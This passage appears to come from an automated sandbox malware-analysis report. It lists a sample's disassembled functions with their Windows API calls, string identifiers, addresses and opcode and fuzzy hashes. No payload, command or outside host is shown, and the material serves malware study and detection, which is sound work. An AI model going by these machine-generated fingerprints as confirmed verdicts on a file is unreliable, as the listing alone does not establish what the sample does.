                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                            • String ID:
                            • API String ID: 4176008265-0
                            • Opcode ID: 7c4db166d30a9af7de7c8ab07359cab6af21e127e3e46bb58a200a80db2a5569
                            • Instruction ID: 2cfd66b14b8bd57700f31f0cfe96003fe9eea2b667b752cc1c3675723124fc0c
                            • Opcode Fuzzy Hash: 7c4db166d30a9af7de7c8ab07359cab6af21e127e3e46bb58a200a80db2a5569
                            • Instruction Fuzzy Hash: BE619D7090124AAFDF11CFA9CD88EBE7BB9FB06304F180059E881A3261D731AE45DB31
                            Function 00DC6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DC6FA5
                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DC6FA8
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DC6FCC
                            • _memset.LIBCMT ref: 00DC6FDD
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DC6FEF
                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DC7067
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow_memset
                            • String ID:
                            • API String ID: 830647256-0
                            • Opcode ID: 15ed2d18af62a12fe56c38c8e2ece36fa5cfe1d8f1d7e974da39ade15699bacf
                            • Instruction ID: c39364e9dcda1e6e22d88f7a19249f5a427888951d0f39ea12e69001ad71c731
                            • Opcode Fuzzy Hash: 15ed2d18af62a12fe56c38c8e2ece36fa5cfe1d8f1d7e974da39ade15699bacf
                            • Instruction Fuzzy Hash: 43614975900209AFDB11DFA4CC81FEE77B8EB09710F14416AFA14AB2A1D771AD45DFA0
                            Function 00D96B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D96BBF
                            • SafeArrayAllocData.OLEAUT32(?), ref: 00D96C18
                            • VariantInit.OLEAUT32(?), ref: 00D96C2A
                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D96C4A
                            • VariantCopy.OLEAUT32(?,?), ref: 00D96C9D
                            • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00D96950), ref: 00D96CB1
                            • VariantClear.OLEAUT32(?), ref: 00D96CC6
                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00D96CD3
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D96CDC
                            • VariantClear.OLEAUT32(?), ref: 00D96CEE
                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D96CF9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 59b21addaa0e707a0f68bba70ba2d92af11d0a5e1e4e5edc95140fbfe1f503b2
                            • Instruction ID: b6a1383a00832d4d075be86c2f4d598d9cbfd3c42f716843d17283e436ff51de
                            • Opcode Fuzzy Hash: 59b21addaa0e707a0f68bba70ba2d92af11d0a5e1e4e5edc95140fbfe1f503b2
                            • Instruction Fuzzy Hash: FB41F875A0021AAFCF049FA9D854DEEBBB9EF48354B008069F955E7261DB30E945CBB0
                            Function 00DB83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • CoInitialize.OLE32 ref: 00DB8403
                            • CoUninitialize.OLE32 ref: 00DB840E
                            • CoCreateInstance.OLE32(?,00000000,00000017,00DD2BEC,?), ref: 00DB846E
                            • IIDFromString.OLE32(?,?), ref: 00DB84E1
                            • VariantInit.OLEAUT32(?), ref: 00DB857B
                            • VariantClear.OLEAUT32(?), ref: 00DB85DC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 834269672-1287834457
                            • Opcode ID: 188eee374832b45f25b9a925aaa913c02cbc8c9dc93826095a66fc2dbbd1a407
                            • Instruction ID: b1515d7c7b53679b2b1e942ac3744e6602c44ec50e8eb91051a8f98d1ba4666c
                            • Opcode Fuzzy Hash: 188eee374832b45f25b9a925aaa913c02cbc8c9dc93826095a66fc2dbbd1a407
                            • Instruction Fuzzy Hash: 23616B70608312DFC720DF54C849EAABBE9EF49754F144819F9869B291CB70ED48DBB2
                            Function 00DB5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WSOCK32(00000101,?), ref: 00DB5793
                            • inet_addr.WSOCK32(?,?,?), ref: 00DB57D8
                            • gethostbyname.WSOCK32(?), ref: 00DB57E4
                            • IcmpCreateFile.IPHLPAPI ref: 00DB57F2
                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5862
                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DB5878
                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00DB58ED
                            • WSACleanup.WSOCK32 ref: 00DB58F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                            • String ID: Ping
                            • API String ID: 1028309954-2246546115
                            • Opcode ID: 42e8c4e880ae1c19b285ed40d78ab17089a5c65159cc4158a25c764f6037c2e0
                            • Instruction ID: 5d1118526c84c024ea42921d695bc4ff49e393ca786af2d9b6d26faecdc9f710
                            • Opcode Fuzzy Hash: 42e8c4e880ae1c19b285ed40d78ab17089a5c65159cc4158a25c764f6037c2e0
                            • Instruction Fuzzy Hash: B2514D35604701DFDB109F25EC45BAAB7E4EF48710F08456AF996DB2A5DB70E800DB71
                            Function 00DAB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAB4D0
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DAB546
                            • GetLastError.KERNEL32 ref: 00DAB550
                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00DAB5BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: 231b343b528e884715c48fba9bebfa48eef7e7237fa9b057ad5dcd9a6ef86ab4
                            • Instruction ID: ecc51e0af6b8510fde1514c3e1f3076cc68521efbc570d20e444ee90f0e5696a
                            • Opcode Fuzzy Hash: 231b343b528e884715c48fba9bebfa48eef7e7237fa9b057ad5dcd9a6ef86ab4
                            • Instruction Fuzzy Hash: 3A316035E0020A9FCB10DBA8C845EBEBBB4EF46320F148166E505D7292DB71DA46DB71
                            Function 00D98F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D99014
                            • GetDlgCtrlID.USER32 ref: 00D9901F
                            • GetParent.USER32 ref: 00D9903B
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D9903E
                            • GetDlgCtrlID.USER32 ref: 00D99047
                            • GetParent.USER32(?), ref: 00D99063
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D99066
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: dfa92c821650bcc5f5d97f8b175b7545549cfed2eb021320f85dbda76d251ef0
                            • Instruction ID: 90eaaf05c70554f1c1c848aa9d266601ce2b596c99bc37bbd39589f4d1928b2e
                            • Opcode Fuzzy Hash: dfa92c821650bcc5f5d97f8b175b7545549cfed2eb021320f85dbda76d251ef0
                            • Instruction Fuzzy Hash: 9121D074A00209BFDF04ABA4CC95EFEBB75EF49310F104219F961972A2DB759819DB30
                            Function 00D9907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D990FD
                            • GetDlgCtrlID.USER32 ref: 00D99108
                            • GetParent.USER32 ref: 00D99124
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D99127
                            • GetDlgCtrlID.USER32 ref: 00D99130
                            • GetParent.USER32(?), ref: 00D9914C
                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D9914F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 1536045017-1403004172
                            • Opcode ID: 0ac2df70ed4132e509f0ccfd4ee814444b84e6ba488c505d7ab13c7f644a3008
                            • Instruction ID: 2dbb6fd9faae6114fa3a92a67bf9adbdcef00e4165efe044630a573e28656d77
                            • Opcode Fuzzy Hash: 0ac2df70ed4132e509f0ccfd4ee814444b84e6ba488c505d7ab13c7f644a3008
                            • Instruction Fuzzy Hash: E221F574A4020ABBDF00ABA4CC85EFEBB75EF48300F004119F955973A2DB758819DB30
                            Function 00D99163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetParent.USER32 ref: 00D9916F
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00D99184
                            • _wcscmp.LIBCMT ref: 00D99196
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D99211
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: c27a42b2f62366a68f4a56a74dae99797e8a6a8f545532157fec70bfc2fc5e81
                            • Instruction ID: a8e79ebfb7942907b067a3009e4bc0a9623d69b8e6b8af41c9fa93a529ea365d
                            • Opcode Fuzzy Hash: c27a42b2f62366a68f4a56a74dae99797e8a6a8f545532157fec70bfc2fc5e81
                            • Instruction Fuzzy Hash: 5011EC7A688307BAFF212728DC16DF7B79CDB15720B20412AFA00E54D2FEA298555A74
                            Function 00DB88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 00DB88D7
                            • CoInitialize.OLE32(00000000), ref: 00DB8904
                            • CoUninitialize.OLE32 ref: 00DB890E
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00DB8A0E
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DB8B3B
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00DD2C0C), ref: 00DB8B6F
                            • CoGetObject.OLE32(?,00000000,00DD2C0C,?), ref: 00DB8B92
                            • SetErrorMode.KERNEL32(00000000), ref: 00DB8BA5
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DB8C25
                            • VariantClear.OLEAUT32(?), ref: 00DB8C35
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID:
                            • API String ID: 2395222682-0
                            • Opcode ID: f399f577bd07b00deb859b79d753d38b7bafe8fd20327d4f83585a8415739584
                            • Instruction ID: b8ec0c0e0cb41dc92632c9bd3b632321b16d2b33bcf7975cfd703f1eb615bafa
                            • Opcode Fuzzy Hash: f399f577bd07b00deb859b79d753d38b7bafe8fd20327d4f83585a8415739584
                            • Instruction Fuzzy Hash: 8FC1F2B1608305EFC700DF68C88496ABBE9EF89748F04495DF98A9B251DB71ED05CB62
                            Function 00DA7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00DA7A6C
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 1af7e4db83df48e26833af9f4618158f950fd1e245515c9e460bc1175e91c757
                            • Instruction ID: 81634d339c66016d831483a5ad28fc9f0b82cf862e6fa220cf9151e297fc2f0a
                            • Opcode Fuzzy Hash: 1af7e4db83df48e26833af9f4618158f950fd1e245515c9e460bc1175e91c757
                            • Instruction Fuzzy Hash: 53B16B72A0821A9FDB00DFA5C885BBEB7B5FF0A321F244429E941E7251D734E941CBB1
                            Function 00DA11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32(?,?,?,?,?,00DA0268,?,00000001), ref: 00DA11F0
                            • GetForegroundWindow.USER32 ref: 00DA1204
                            • GetWindowThreadProcessId.USER32(00000000), ref: 00DA120B
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA121A
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA122C
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA1245
                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00DA1257
                            • AttachThreadInput.USER32(00000000,00000000), ref: 00DA129C
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00DA12B1
                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00DA12BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: a15d61d79dd1a26c24146d532c94150497c1054ba226b32043e3b861359b1e4d
                            • Instruction ID: 32b456dc66ed3a092e6983f54680c82de4b1ba539004c9516617be77688544f7
                            • Opcode Fuzzy Hash: a15d61d79dd1a26c24146d532c94150497c1054ba226b32043e3b861359b1e4d
                            • Instruction Fuzzy Hash: F031FD79600306BFEF209F91EC8AFA937AAEB56351F144125F900E62A0D3B5DD848B74
                            Function 00D4FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                            Download Yara Rule
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D4FAA6
                            • OleUninitialize.OLE32(?,00000000), ref: 00D4FB45
                            • UnregisterHotKey.USER32(?), ref: 00D4FC9C
                            • DestroyWindow.USER32 ref: 00D845D6
                            • FreeLibrary.KERNEL32(?), ref: 00D8463B
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D84668
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: 5c34802374aec9a3a384b2b895ee68145f042b4fdd111b8f6e95c6d6a628d41f
                            • Instruction ID: 77c5bd3d5ffcec8b1f4deb3a6addc9530fab5a16a17dbb81bd24b1a97ba757bd
                            • Opcode Fuzzy Hash: 5c34802374aec9a3a384b2b895ee68145f042b4fdd111b8f6e95c6d6a628d41f
                            • Instruction Fuzzy Hash: 98A14A347012128FCB29EF14C995A69F7A5EF15710F5842ADE84AAB262DB30ED16CF70
                            Function 00D9A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: e072b5a2d993f08b8232fcb88f7a26f06bcb46dbbe12541feea907b0ac6d6afd
                            • Instruction ID: 3a492825e818e09f81eaa22b2150c1b8d93dd78dff508289ee921483cec41269
                            • Opcode Fuzzy Hash: e072b5a2d993f08b8232fcb88f7a26f06bcb46dbbe12541feea907b0ac6d6afd
                            • Instruction Fuzzy Hash: C0918332600606ABCF08DFA8C442BEEFB75FF04340F548119E999A7251DB31A999DBF1
                            Function 00D42E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 00D42EAE
                              • Part of subcall function 00D41DB3: GetClientRect.USER32(?,?), ref: 00D41DDC
                              • Part of subcall function 00D41DB3: GetWindowRect.USER32(?,?), ref: 00D41E1D
                              • Part of subcall function 00D41DB3: ScreenToClient.USER32(?,?), ref: 00D41E45
                            • GetDC.USER32 ref: 00D7CD32
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D7CD45
                            • SelectObject.GDI32(00000000,00000000), ref: 00D7CD53
                            • SelectObject.GDI32(00000000,00000000), ref: 00D7CD68
                            • ReleaseDC.USER32(?,00000000), ref: 00D7CD70
                            • MoveWindow.USER32(?,?,?,?,?,?), ref: 00D7CDFB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: 7411c81444f5bd71e9902c6622ca9a26ae37a6067c0575816670619aabc1a157
                            • Instruction ID: 1436b68ed8b7e24c76e68d9a24bb7e6d4b6ed09e5182cd0f6b9cdacefffd0b48
                            • Opcode Fuzzy Hash: 7411c81444f5bd71e9902c6622ca9a26ae37a6067c0575816670619aabc1a157
                            • Instruction Fuzzy Hash: 8B717F31510205DFCF258F64C884ABA7BB5FF48360F18927AFD599A2A6E7319881DB70
